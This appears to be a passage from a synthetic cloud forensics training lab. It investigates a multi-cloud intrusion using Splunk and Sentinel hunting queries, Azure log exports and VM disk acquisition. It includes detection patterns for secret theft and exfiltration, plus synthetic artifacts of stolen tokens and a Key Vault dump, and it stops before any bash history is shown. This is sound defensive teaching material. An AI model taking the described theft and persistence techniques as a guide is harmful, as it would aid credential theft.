userIdentity.type="AssumedRole"
earliest=-24h
| search userIdentity.arn="*i-0a1b2c3d4e5f6789a*"
| search NOT sourceIPAddress IN ("10.100.2.50", "10.50.1.10")
| table _time, eventName, userIdentity.arn, sourceIPAddress,
userAgent, requestParameters
// -----------------------------------------------------------------
// Detection: Unusual S3 Data Download Volume (Exfiltration)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
index=aws sourcetype="aws:s3:accesslogs"
operation="REST.GET.OBJECT" http_status=200
earliest=-24h
| bin _time span=1h
| stats
    sum(object_size) as TotalBytes,
    count as FileCount,
    dc(key) as UniqueKeys,
    values(key) as Files
  by requester, bucket, _time
| where TotalBytes > 50000000
| eval TotalMB = round(TotalBytes / 1048576, 1)
| table _time, requester, bucket, TotalMB, FileCount, UniqueKeys, Files
| sort -TotalMB
// -----------------------------------------------------------------
// Detection: VPC Flow — Large Outbound Data Transfer
// MITRE: T1048 — Exfiltration Over Alternative Protocol
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudwatchlogs:vpcflow"
action=ACCEPT
earliest=-24h
| where NOT (cidrmatch("10.0.0.0/8", dest_ip) OR
cidrmatch("172.16.0.0/12", dest_ip) OR
cidrmatch("192.168.0.0/16", dest_ip))
| bin _time span=15m
| stats
    sum(bytes) as TotalBytes,
    sum(packets) as TotalPackets,
    count as ConnectionCount,
    values(dest_port) as DestPorts
  by src_ip, dest_ip, _time
| where TotalBytes > 10000000
| eval TotalMB = round(TotalBytes / 1048576, 1)
| table _time, src_ip, dest_ip, TotalMB, TotalPackets,
ConnectionCount, DestPorts
| sort -TotalMB
Exercise 3: Azure Activity Log & Sentinel Investigation¶
Exercise Objective
Investigate the Azure component of the multi-cloud intrusion. Export and analyze Azure Activity Logs, Azure AD sign-in and audit logs, hunt for compromise indicators in Microsoft Sentinel, detect Managed Identity and Service Principal abuse, and audit Key Vault access patterns.
MITRE ATT&CK Techniques:
- T1078.004 -- Valid Accounts: Cloud Accounts
- T1098.003 -- Account Manipulation: Additional Cloud Roles
- T1552.001 -- Unsecured Credentials: Credentials in Files
- T1556.006 -- Modify Authentication Process: Multi-Factor Authentication
- T1528 -- Steal Application Access Token
Scenario Context¶
Azure Incident Indicators
At 2026-03-24T14:38 UTC -- six minutes after the AWS GuardDuty alert -- Microsoft Sentinel triggered a medium-severity alert: Unusual Key Vault access by Managed Identity. The Managed Identity mi-compliance-scanner (assigned to VM vm-compliance-01) was observed reading 47 secrets from Key Vault kv-qfs-prod-eastus within a 3-minute window. Historical baseline: this identity reads 2-3 secrets per day for CIS benchmark scanning.
Additionally, at 14:52 UTC, the Service Principal sp-devops-pipeline attempted to add a new credential (client secret) to itself -- a classic persistence technique.
Azure Indicators:
| Indicator | Value | Type |
|---|---|---|
| Managed Identity | mi-compliance-scanner | Anomalous Key Vault access |
| Service Principal | sp-devops-pipeline | Attempted credential addition |
| Key Vault | kv-qfs-prod-eastus | 47 secret reads in 3 minutes |
| Source VM | vm-compliance-01 (10.150.2.10) | Compromised compliance scanner |
| Alert time | 2026-03-24T14:38:00Z | Sentinel alert |
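Before diving into the logs, it helps to quantify how far outside baseline this behavior sits; a quick back-of-the-envelope sketch using the numbers from the alert above (all synthetic):

```python
# Anomaly math: 47 secret reads in 3 minutes vs. a 2-3 reads/day baseline
observed_reads = 47
window_minutes = 3
baseline_per_day = 3  # upper end of the historical baseline

# Project the burst onto a per-day rate and compare against baseline
rate_per_day = observed_reads * (24 * 60 / window_minutes)
ratio = rate_per_day / baseline_per_day
print(f"Projected rate: {rate_per_day:,.0f} reads/day vs baseline {baseline_per_day}/day")
print(f"Roughly {ratio:,.0f}x baseline")
```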
Step 3.1: Azure Activity Log Export and Analysis¶
# ============================================================
# Step 3.1: Export Azure Activity Logs
# Capture management-plane operations for the incident window
# ============================================================
# Export Azure Activity Log for the incident window (72 hours)
$ az monitor activity-log list \
--start-time "2026-03-22T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--output json \
> ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json
# SYNTHETIC: Downloaded 2,341 activity log entries
# Filter for the compromised Managed Identity
$ cat ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json | \
jq '[.[] | select(.caller == "mi-compliance-scanner" or
.caller == "sp-devops-pipeline")] | length'
# SYNTHETIC: 89
# Extract Key Vault operations by the compromised identity
$ cat ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json | \
  jq '[.[] | select(.caller == "mi-compliance-scanner") |
       select(.resourceType.value == "Microsoft.KeyVault/vaults") |
       {time: .eventTimestamp, operation: .operationName.value,
        status: .status.value, resource: .resourceId}] | sort_by(.time)'
# SYNTHETIC OUTPUT:
[
{
"time": "2026-03-24T14:35:12Z",
"operation": "Microsoft.KeyVault/vaults/secrets/read",
"status": "Succeeded",
"resource": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.KeyVault/vaults/kv-qfs-prod-eastus"
},
{
"time": "2026-03-24T14:35:15Z",
"operation": "Microsoft.KeyVault/vaults/secrets/read",
"status": "Succeeded",
"resource": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.KeyVault/vaults/kv-qfs-prod-eastus"
}
]
# ... (47 total secret reads between 14:35 and 14:38)
# Check for Service Principal credential manipulation
$ cat ~/cloud-dfir-lab24/evidence/azure/activity-logs/activity-log-full.json | \
jq '[.[] | select(.caller == "sp-devops-pipeline") |
{time: .eventTimestamp, operation: .operationName.value,
status: .status.value, resource: .resourceId,
properties: .properties}]'
# SYNTHETIC OUTPUT:
[
{
"time": "2026-03-24T14:52:33Z",
"operation": "Microsoft.Authorization/roleAssignments/write",
"status": "Failed",
"resource": "/subscriptions/12345678-abcd-ef01-2345-678901234567/providers/Microsoft.Authorization/roleAssignments/a1b2c3d4",
"properties": {
"statusCode": "Forbidden",
"message": "The client 'sp-devops-pipeline' with object id 'a1b2c3d4-0000-0000-0000-000000000001' does not have authorization to perform action 'Microsoft.Authorization/roleAssignments/write'"
}
},
{
"time": "2026-03-24T14:53:01Z",
"operation": "Microsoft.Graph/applications/credentials/update",
"status": "Succeeded",
"resource": "applications/a1b2c3d4-0000-0000-0000-000000000002",
"properties": {
"message": "Added new client secret to application"
}
}
]
# CRITICAL FINDING: sp-devops-pipeline successfully added a new client
# secret to its own application registration at 14:53 UTC
# This is a persistence technique — the attacker now has a backdoor credential
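This self-modification pattern is easy to sweep for across the full activity-log export; a minimal sketch whose field names mirror the synthetic excerpt above, not a guaranteed Azure schema:

```python
import json

# Two events from the synthetic activity-log excerpt, flattened for triage
raw = """[
  {"time": "2026-03-24T14:53:01Z", "caller": "sp-devops-pipeline",
   "operation": "Microsoft.Graph/applications/credentials/update",
   "status": "Succeeded", "target": "sp-devops-pipeline"},
  {"time": "2026-03-24T14:52:33Z", "caller": "sp-devops-pipeline",
   "operation": "Microsoft.Authorization/roleAssignments/write",
   "status": "Failed", "target": "a1b2c3d4"}
]"""

def find_self_credential_adds(events):
    """Flag successful credential updates where the caller modified itself."""
    return [e for e in events
            if e["operation"].endswith("credentials/update")
            and e["status"] == "Succeeded"
            and e["caller"] == e["target"]]  # self-modification = persistence

hits = find_self_credential_adds(json.loads(raw))
for e in hits:
    print(f"[!] {e['time']} {e['caller']} added a credential to itself")
```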
Step 3.2: Azure AD Sign-In and Audit Log Forensics¶
# ============================================================
# Step 3.2: Azure AD Sign-In Logs & Audit Logs
# Detect authentication anomalies and privilege changes
# ============================================================
# Export Azure AD Sign-In Logs via Microsoft Graph API
$ az rest --method GET \
--url "https://graph.microsoft.com/v1.0/auditLogs/signIns?\$filter=createdDateTime ge 2026-03-22T00:00:00Z and createdDateTime le 2026-03-25T00:00:00Z&\$top=500" \
--output json \
> ~/cloud-dfir-lab24/evidence/azure/signin-logs/signin-logs.json
# Filter for suspicious sign-ins
$ cat ~/cloud-dfir-lab24/evidence/azure/signin-logs/signin-logs.json | \
jq '.value[] | select(.riskState == "confirmedCompromised" or
.riskLevelDuringSignIn == "high" or
.status.errorCode != 0) |
{time: .createdDateTime, user: .userDisplayName,
app: .appDisplayName, ip: .ipAddress,
location: .location.city, risk: .riskLevelDuringSignIn,
status: .status.errorCode, failure: .status.failureReason}'
# SYNTHETIC OUTPUT — Suspicious Sign-Ins:
{
"time": "2026-03-24T14:25:00Z",
"user": "DevOps Service Account",
"app": "Azure Portal",
"ip": "203.0.113.42",
"location": "Unknown",
"risk": "high",
"status": 0,
"failure": null
}
{
"time": "2026-03-24T14:26:30Z",
"user": "DevOps Service Account",
"app": "Microsoft Graph",
"ip": "203.0.113.42",
"location": "Unknown",
"risk": "high",
"status": 0,
"failure": null
}
{
"time": "2026-03-24T14:50:00Z",
"user": "DevOps Service Account",
"app": "Azure Key Vault",
"ip": "203.0.113.42",
"location": "Unknown",
"risk": "high",
"status": 0,
"failure": null
}
# Export Azure AD Audit Logs
$ az rest --method GET \
--url "https://graph.microsoft.com/v1.0/auditLogs/directoryAudits?\$filter=activityDateTime ge 2026-03-22T00:00:00Z and activityDateTime le 2026-03-25T00:00:00Z&\$top=500" \
--output json \
> ~/cloud-dfir-lab24/evidence/azure/audit-logs/directory-audits.json
# Filter for credential and permission changes
$ cat ~/cloud-dfir-lab24/evidence/azure/audit-logs/directory-audits.json | \
jq '.value[] | select(
.activityDisplayName == "Add service principal credentials" or
.activityDisplayName == "Add member to role" or
.activityDisplayName == "Add app role assignment to service principal" or
.activityDisplayName == "Add delegated permission grant" or
.activityDisplayName == "Consent to application" or
.activityDisplayName == "Update application") |
{time: .activityDateTime, activity: .activityDisplayName,
initiatedBy: .initiatedBy, target: .targetResources[0].displayName,
result: .result}'
# SYNTHETIC OUTPUT:
{
"time": "2026-03-24T14:53:01Z",
"activity": "Add service principal credentials",
"initiatedBy": {"app": {"displayName": "sp-devops-pipeline", "appId": "a1b2c3d4-0000-0000-0000-000000000002"}},
"target": "sp-devops-pipeline",
"result": "success"
}
{
"time": "2026-03-24T15:15:00Z",
"activity": "Add member to role",
"initiatedBy": {"app": {"displayName": "sp-devops-pipeline", "appId": "a1b2c3d4-0000-0000-0000-000000000002"}},
"target": "Key Vault Secrets Officer",
"result": "failure"
}
# FINDING: Attacker added credentials to sp-devops-pipeline (persistence)
# and attempted but failed to escalate to Key Vault Secrets Officer role
Step 3.3: Microsoft Sentinel Hunting Queries¶
// -----------------------------------------------------------------
// Hunt: Anomalous Key Vault Secret Access by Managed Identity
// Case: QFS-IR-2026-0042 | MITRE: T1552.001
// -----------------------------------------------------------------
let DailyAvg = toscalar(AzureDiagnostics
    | where TimeGenerated between (ago(30d) .. ago(1d))
    | where ResourceType == "VAULTS"
    | where OperationName == "SecretGet"
    | where identity_claim_oid_g == "a1b2c3d4-0000-0000-0000-mi-compliance"
    | summarize count() / 30.0);
//
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where ResourceType == "VAULTS"
| where OperationName == "SecretGet"
| where identity_claim_oid_g == "a1b2c3d4-0000-0000-0000-mi-compliance"
| summarize
    SecretReads = count(),
    UniqueSecrets = dcount(id_s),
    SecretNames = make_set(requestUri_s, 50),
    FirstAccess = min(TimeGenerated),
    LastAccess = max(TimeGenerated)
  by Resource, CallerIPAddress, bin(TimeGenerated, 5m)
| extend DurationMinutes = datetime_diff('minute', LastAccess, FirstAccess)
| where SecretReads > 10
| extend BaselineDailyReads = round(DailyAvg, 1) // 30-day historical average
| project TimeGenerated, Resource, CallerIPAddress, SecretReads,
    UniqueSecrets, DurationMinutes, BaselineDailyReads, SecretNames
// -----------------------------------------------------------------
// Hunt: Service Principal Credential Addition (Persistence)
// MITRE: T1098.001 — Account Manipulation: Additional Cloud Credentials
// -----------------------------------------------------------------
AuditLogs
| where TimeGenerated > ago(7d)
| where OperationName == "Add service principal credentials"
| where Result == "success"
| extend InitiatedByApp = tostring(InitiatedBy.app.displayName)
| extend InitiatedByAppId = tostring(InitiatedBy.app.appId)
| extend TargetApp = tostring(TargetResources[0].displayName)
| extend TargetAppId = tostring(TargetResources[0].id)
| where InitiatedByAppId == TargetAppId // Self-modification = suspicious
| project TimeGenerated, InitiatedByApp, InitiatedByAppId,
TargetApp, TargetAppId, Result,
ModifiedProperties = TargetResources[0].modifiedProperties
// -----------------------------------------------------------------
// Hunt: Managed Identity Pivoting Between Resources
// MITRE: T1550.001 — Use Alternate Authentication Material
// -----------------------------------------------------------------
AzureActivity
| where TimeGenerated > ago(24h)
| where Caller contains "mi-compliance-scanner"
| summarize
ResourceTypes = make_set(ResourceProviderValue),
Operations = make_set(OperationNameValue),
OperationCount = count(),
UniqueResources = dcount(_ResourceId),
FirstOp = min(TimeGenerated),
LastOp = max(TimeGenerated)
by Caller, CallerIpAddress, bin(TimeGenerated, 1h)
| where OperationCount > 20
| project TimeGenerated, Caller, CallerIpAddress, OperationCount,
UniqueResources, ResourceTypes, Operations
// -----------------------------------------------------------------
// Hunt: Azure Key Vault — Secrets Accessed by Unauthorized Identity
// MITRE: T1552.001 — Unsecured Credentials: Credentials in Files
// -----------------------------------------------------------------
let AuthorizedIdentities = dynamic([
"a1b2c3d4-0000-0000-0000-000000000099" // Known automation (SYNTHETIC)
]);
AzureDiagnostics
| where TimeGenerated > ago(7d)
| where ResourceType == "VAULTS"
| where Resource == "KV-QFS-PROD-EASTUS"
| where OperationName in ("SecretGet", "SecretList")
| where ResultType == "Success"
| where identity_claim_oid_g !in (AuthorizedIdentities)
| summarize
AccessCount = count(),
UniqueSecrets = dcount(requestUri_s),
SecretList = make_set(requestUri_s, 50),
FirstAccess = min(TimeGenerated),
LastAccess = max(TimeGenerated)
by identity_claim_oid_g, CallerIPAddress, Resource
| where AccessCount > 5
| project identity_claim_oid_g, CallerIPAddress, Resource,
AccessCount, UniqueSecrets, FirstAccess, LastAccess, SecretList
| order by AccessCount desc
// -----------------------------------------------------------------
// Hunt: Anomalous Key Vault Secret Access by Managed Identity
// Case: QFS-IR-2026-0042 | MITRE: T1552.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:aad:audit" OR sourcetype="azure:monitor"
ResourceType="VAULTS" OperationName="SecretGet"
"identity_claim_oid_g"="a1b2c3d4-0000-0000-0000-mi-compliance"
earliest=-24h
| bin _time span=5m
| stats
    count as SecretReads,
    dc(id_s) as UniqueSecrets,
    values(requestUri_s) as SecretNames,
    min(_time) as FirstAccess,
    max(_time) as LastAccess
  by Resource, CallerIPAddress, _time
| eval DurationMinutes = round((LastAccess - FirstAccess) / 60, 1)
| where SecretReads > 10
| convert ctime(FirstAccess) ctime(LastAccess)
| table _time, Resource, CallerIPAddress, SecretReads,
UniqueSecrets, DurationMinutes, SecretNames
// -----------------------------------------------------------------
// Hunt: Service Principal Credential Addition (Persistence)
// MITRE: T1098.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:aad:audit"
operationName="Add service principal credentials"
result="success"
earliest=-7d
| eval InitiatedByApp=spath(_raw, "initiatedBy.app.displayName")
| eval InitiatedByAppId=spath(_raw, "initiatedBy.app.appId")
| eval TargetApp=spath(_raw, "targetResources{0}.displayName")
| eval TargetAppId=spath(_raw, "targetResources{0}.id")
| where InitiatedByAppId == TargetAppId
| table _time, InitiatedByApp, InitiatedByAppId, TargetApp, result
// -----------------------------------------------------------------
// Hunt: Managed Identity Pivoting Between Resources
// MITRE: T1550.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor:activity"
Caller="*mi-compliance-scanner*"
earliest=-24h
| bin _time span=1h
| stats
    values(ResourceProviderValue) as ResourceTypes,
    values(OperationNameValue) as Operations,
    count as OperationCount,
    dc(ResourceId) as UniqueResources,
    min(_time) as FirstOp,
    max(_time) as LastOp
  by Caller, CallerIpAddress, _time
| where OperationCount > 20
| convert ctime(FirstOp) ctime(LastOp)
| table _time, Caller, CallerIpAddress, OperationCount,
UniqueResources, ResourceTypes, Operations
// -----------------------------------------------------------------
// Hunt: Key Vault — Secrets Accessed by Unauthorized Identity
// MITRE: T1552.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor"
ResourceType="VAULTS" Resource="KV-QFS-PROD-EASTUS"
(OperationName="SecretGet" OR OperationName="SecretList")
ResultType="Success"
earliest=-7d
| search NOT identity_claim_oid_g IN ("a1b2c3d4-0000-0000-0000-000000000099")
| stats
count as AccessCount,
dc(requestUri_s) as UniqueSecrets,
values(requestUri_s) as SecretList,
min(_time) as FirstAccess,
max(_time) as LastAccess
by identity_claim_oid_g, CallerIPAddress, Resource
| where AccessCount > 5
| sort -AccessCount
| convert ctime(FirstAccess) ctime(LastAccess)
| table identity_claim_oid_g, CallerIPAddress, Resource,
AccessCount, UniqueSecrets, FirstAccess, LastAccess, SecretList
Step 3.4: Key Vault Diagnostic Log Deep Dive¶
# ============================================================
# Step 3.4: Key Vault Access Audit
# Enumerate exactly which secrets the attacker read
# ============================================================
# Export Key Vault diagnostic logs
$ az monitor diagnostic-settings list \
--resource /subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.KeyVault/vaults/kv-qfs-prod-eastus \
--output json
# SYNTHETIC OUTPUT — diagnostic settings:
{
"value": [
{
"name": "kv-diag-to-sentinel",
"logs": [
{"category": "AuditEvent", "enabled": true, "retentionPolicy": {"days": 90, "enabled": true}}
],
"workspaceId": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-security/providers/Microsoft.OperationalInsights/workspaces/law-qfs-sentinel"
}
]
}
# Query Key Vault audit events from Log Analytics
# In Sentinel, run this KQL query:
// Key Vault Secret Read Audit — Full Enumeration
// Case: QFS-IR-2026-0042
AzureDiagnostics
| where TimeGenerated between (
datetime("2026-03-24T14:30:00Z") .. datetime("2026-03-24T15:00:00Z"))
| where ResourceType == "VAULTS"
| where Resource == "KV-QFS-PROD-EASTUS"
| where OperationName == "SecretGet"
| where ResultType == "Success"
| extend SecretName = extract(@"secrets/([^/]+)", 1, requestUri_s)
| project TimeGenerated, OperationName, SecretName,
CallerIPAddress, identity_claim_oid_g,
ResultType, DurationMs
| order by TimeGenerated asc
# SYNTHETIC QUERY RESULTS — Secrets accessed by the compromised identity:
# TimeGenerated SecretName CallerIPAddress
# 2026-03-24T14:35:12 db-prod-connection-string 10.150.2.10
# 2026-03-24T14:35:14 db-prod-admin-password 10.150.2.10
# 2026-03-24T14:35:16 api-key-banking-gateway 10.150.2.10
# 2026-03-24T14:35:18 api-key-payment-processor 10.150.2.10
# 2026-03-24T14:35:20 azure-storage-connection-string 10.150.2.10
# 2026-03-24T14:35:22 aws-cross-account-secret 10.150.2.10
# 2026-03-24T14:35:24 smtp-relay-credentials 10.150.2.10
# 2026-03-24T14:35:26 ssl-cert-private-key 10.150.2.10
# 2026-03-24T14:35:28 jwt-signing-key-prod 10.150.2.10
# 2026-03-24T14:35:30 oauth-client-secret 10.150.2.10
# ... (47 total secrets read between 14:35 and 14:38)
# CRITICAL FINDING: The attacker read sensitive secrets including:
# - Database credentials (db-prod-connection-string, db-prod-admin-password)
# - API keys (banking gateway, payment processor)
# - Cross-cloud credentials (aws-cross-account-secret)
# - Cryptographic material (ssl-cert-private-key, jwt-signing-key-prod)
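A small triage sketch can bucket the exposed secret names by blast-radius category to drive rotation priority; the prefix rules below are illustrative assumptions, not QFS naming policy:

```python
# Prefix rules mapping secret-name patterns to blast-radius categories
# (illustrative assumptions based on the synthetic names above)
RULES = [
    (("db-",), "Database credentials"),
    (("api-key-",), "Third-party API keys"),
    (("aws-",), "Cross-cloud credentials"),
    (("ssl-", "jwt-"), "Cryptographic material"),
]

def categorize(secret_name):
    """Return the first matching category for a secret name."""
    for prefixes, label in RULES:
        if secret_name.startswith(prefixes):
            return label
    return "Other"

secrets = ["db-prod-connection-string", "db-prod-admin-password",
           "api-key-banking-gateway", "aws-cross-account-secret",
           "ssl-cert-private-key", "jwt-signing-key-prod",
           "smtp-relay-credentials"]
for name in sorted(secrets, key=categorize):
    print(f"{name:<32} {categorize(name)}")
```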
Critical Finding: Cross-Cloud Credential Theft
The compromised Managed Identity read the aws-cross-account-secret from Key Vault. This secret likely contains AWS IAM credentials that enable cross-cloud access. This may explain how the attacker pivoted from Azure to AWS (or vice versa). The investigation must determine:
- What AWS resources does aws-cross-account-secret grant access to?
- Was this the initial entry point (Azure -> AWS pivot)?
- Has the cross-cloud credential been rotated?
All data is 100% SYNTHETIC.
Exercise 4: Azure VM Disk Forensics & Network Evidence¶
Exercise Objective
Perform forensic acquisition of the compromised Azure VM (vm-compliance-01). Create OS disk snapshots, export disk images for offline analysis, analyze NSG Flow Logs for network evidence, investigate Azure Storage account access, and collect container logs from AKS workloads.
MITRE ATT&CK Techniques:
- T1005 -- Data from Local System
- T1046 -- Network Service Discovery
- T1190 -- Exploit Public-Facing Application
- T1550.001 -- Use Alternate Authentication Material: Application Access Token
- T1613 -- Container and Resource Discovery
Step 4.1: Azure VM Disk Snapshot and Export¶
# ============================================================
# Step 4.1: Create Snapshot of Compromised Azure VM Disk
# ============================================================
# Get details of the compromised VM
$ az vm show \
--resource-group rg-production \
--name vm-compliance-01 \
--query '{
name: name,
vmId: vmId,
location: location,
powerState: instanceView.statuses[1].displayStatus,
osDisk: storageProfile.osDisk.name,
osDiskId: storageProfile.osDisk.managedDisk.id,
dataDisks: storageProfile.dataDisks[].{name:name, diskId:managedDisk.id}
}' \
--show-details \
--output json
# SYNTHETIC OUTPUT:
{
"name": "vm-compliance-01",
"vmId": "a1b2c3d4-vm01-0000-0000-000000000001",
"location": "eastus",
"powerState": "VM running",
"osDisk": "vm-compliance-01-osdisk",
"osDiskId": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-osdisk",
"dataDisks": [
{
"name": "vm-compliance-01-datadisk-01",
"diskId": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-datadisk-01"
}
]
}
# Create snapshot of the OS disk
$ az snapshot create \
--resource-group rg-forensics \
--name "forensic-snap-vm-compliance-01-os-20260324" \
--source "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-osdisk" \
--location eastus \
--tags CaseId=QFS-IR-2026-0042 EvidenceType=disk-image \
AcquiredBy=forensic-analyst Classification=CONFIDENTIAL \
DoNotDelete=true
# SYNTHETIC OUTPUT:
{
"name": "forensic-snap-vm-compliance-01-os-20260324",
"id": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-forensics/providers/Microsoft.Compute/snapshots/forensic-snap-vm-compliance-01-os-20260324",
"provisioningState": "Succeeded",
"diskSizeGb": 128,
"timeCreated": "2026-03-24T17:00:00.000Z"
}
# Create snapshot of the data disk
$ az snapshot create \
--resource-group rg-forensics \
--name "forensic-snap-vm-compliance-01-data-20260324" \
--source "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-datadisk-01" \
--location eastus \
--tags CaseId=QFS-IR-2026-0042 EvidenceType=disk-image \
AcquiredBy=forensic-analyst Classification=CONFIDENTIAL \
DoNotDelete=true
# Generate SAS URL for disk export (for offline forensic analysis)
$ az snapshot grant-access \
--resource-group rg-forensics \
--name "forensic-snap-vm-compliance-01-os-20260324" \
--duration-in-seconds 86400 \
--access-level Read \
--query accessSas \
--output tsv
# SYNTHETIC SAS URL:
# https://md-forensic.blob.core.windows.net/snapshots/forensic-snap-vm-compliance-01-os-20260324.vhd?sv=2023-11-03&sr=b&sig=REDACTED&se=2026-03-25T17:00:00Z&sp=r
# Download the disk image to the forensic workstation
$ azcopy copy \
"https://md-forensic.blob.core.windows.net/snapshots/forensic-snap-vm-compliance-01-os-20260324.vhd?sv=2023-11-03&sr=b&sig=REDACTED&se=2026-03-25T17:00:00Z&sp=r" \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd
# SYNTHETIC: Download complete — 128 GB VHD file
# Hash the disk image
$ sha256sum ~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd \
> ~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd.sha256
$ echo "[+] Azure VM disk snapshots created and exported"
$ echo "[+] OS disk: 128 GB | Data disk: 256 GB"
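Before any conversion or mounting, the recorded digest should be re-verified on the analysis workstation. A minimal Python sketch of that check (the helper name and streaming chunk size are illustrative, not part of the lab tooling):

```python
import hashlib
from pathlib import Path

def verify_sha256(evidence_path: str, manifest_path: str) -> bool:
    """Recompute a file's SHA-256 and compare it against the digest
    recorded in a sha256sum-style manifest ("<hex>  <filename>")."""
    recorded = Path(manifest_path).read_text().split()[0]
    digest = hashlib.sha256()
    with open(evidence_path, "rb") as f:
        # Stream in 1 MiB chunks — the real target is a 128 GB VHD
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest() == recorded

# Usage (paths follow the lab layout):
# verify_sha256("vm-compliance-01-os.vhd", "vm-compliance-01-os.vhd.sha256")
```

Any mismatch here stops the examination until re-acquisition; analysis of unverified media is difficult to defend later.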
Step 4.2: Azure VM Disk Analysis¶
# ============================================================
# Step 4.2: Mount and Analyze the Azure VM Disk Image
# Convert VHD and mount read-only for examination
# ============================================================
# Convert VHD to raw format for analysis
$ qemu-img convert -f vpc -O raw \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.raw
# List partitions
$ mmls ~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.raw
# SYNTHETIC OUTPUT:
# DOS Partition Table
# Offset Sector: 0
# Units are in 512-byte sectors
#
# Slot Start End Length Description
# 000: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
# 001: ----- 0000000000 0000002047 0000002048 Unallocated
# 002: 000:000 0000002048 0001048575 0001046528 Linux (0x83) — /boot
# 003: 000:001 0001048576 0268435455 0267386880 Linux (0x83) — /
# Mount the root partition read-only
$ sudo mkdir -p /mnt/forensic-evidence/azure-compliance-vm
$ sudo mount -o ro,noexec,nosuid,nodev,loop,offset=$((1048576 * 512)) \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.raw \
/mnt/forensic-evidence/azure-compliance-vm
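The `offset=$((1048576 * 512))` arithmetic comes straight from the `mmls` listing: partition start sector times the 512-byte sector size. A tiny helper makes the conversion explicit (function name is illustrative):

```python
SECTOR_SIZE = 512  # "Units are in 512-byte sectors" per the mmls header

def mount_offset(start_sector: int, sector_size: int = SECTOR_SIZE) -> int:
    """Byte offset for mount's offset= option, from an mmls start sector."""
    return start_sector * sector_size

# Root partition (slot 003) starts at sector 1048576:
print(mount_offset(1048576))  # 536870912
# /boot partition (slot 002) starts at sector 2048:
print(mount_offset(2048))     # 1048576
```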
# Check for attacker artifacts
$ sudo find /mnt/forensic-evidence/azure-compliance-vm/tmp -type f -ls 2>/dev/null
# SYNTHETIC OUTPUT:
# 1048577 4 -rwxr-xr-x 1 root root 2048 Mar 24 14:50 /mnt/forensic-evidence/azure-compliance-vm/tmp/.az_token_cache
# 1048578 4 -rw-r--r-- 1 root root 512 Mar 24 14:52 /mnt/forensic-evidence/azure-compliance-vm/tmp/.sp_creds.json
# 1048579 8 -rwxr-xr-x 1 root root 8192 Mar 24 14:55 /mnt/forensic-evidence/azure-compliance-vm/tmp/.kv_dump.json
# Examine the cached token file
$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/tmp/.az_token_cache
# SYNTHETIC OUTPUT:
{
"access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.REDACTED-SYNTHETIC-TOKEN",
"expires_on": "1774367400",
"resource": "https://vault.azure.net",
"token_type": "Bearer"
}
# Raw IMDS token response (snake_case fields) — this shape is what the
# attacker's jq '.access_token' in the bash history below relies on
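Because the cached token is a JWT, its claims (audience, tenant, object ID, expiry) can be inspected without the signing key by base64url-decoding the payload segment. A sketch against a synthetic token, since the lab value is redacted:

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """Decode a JWT's payload segment without signature verification —
    fine for forensic inspection, never for authentication decisions."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Synthetic example using claim names Azure AD access tokens carry:
body = base64.urlsafe_b64encode(
    json.dumps({"aud": "https://vault.azure.net",
                "tid": "a1b2c3d4-e5f6-7890-abcd-ef1234567890"}).encode()
).rstrip(b"=").decode()
print(jwt_claims(f"header.{body}.signature")["aud"])  # https://vault.azure.net
```

The `aud` claim confirms which resource the stolen token was scoped to (Key Vault here), and `tid` ties it back to the tenant.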
# Examine the stolen Service Principal credentials
$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/tmp/.sp_creds.json
# SYNTHETIC OUTPUT:
{
"appId": "a1b2c3d4-0000-0000-0000-000000000002",
"displayName": "sp-devops-pipeline",
"tenant": "a1b2c3d4-e5f6-7890-abcd-ef1234567890",
"clientSecret": "REDACTED-SYNTHETIC-SECRET"
}
# Examine the Key Vault secrets dump
$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/tmp/.kv_dump.json | jq 'keys'
# SYNTHETIC OUTPUT:
[
"api-key-banking-gateway",
"api-key-payment-processor",
"aws-cross-account-secret",
"azure-storage-connection-string",
"db-prod-admin-password",
"db-prod-connection-string",
"jwt-signing-key-prod",
"oauth-client-secret",
"smtp-relay-credentials",
"ssl-cert-private-key"
]
# Check bash history on the compromised VM
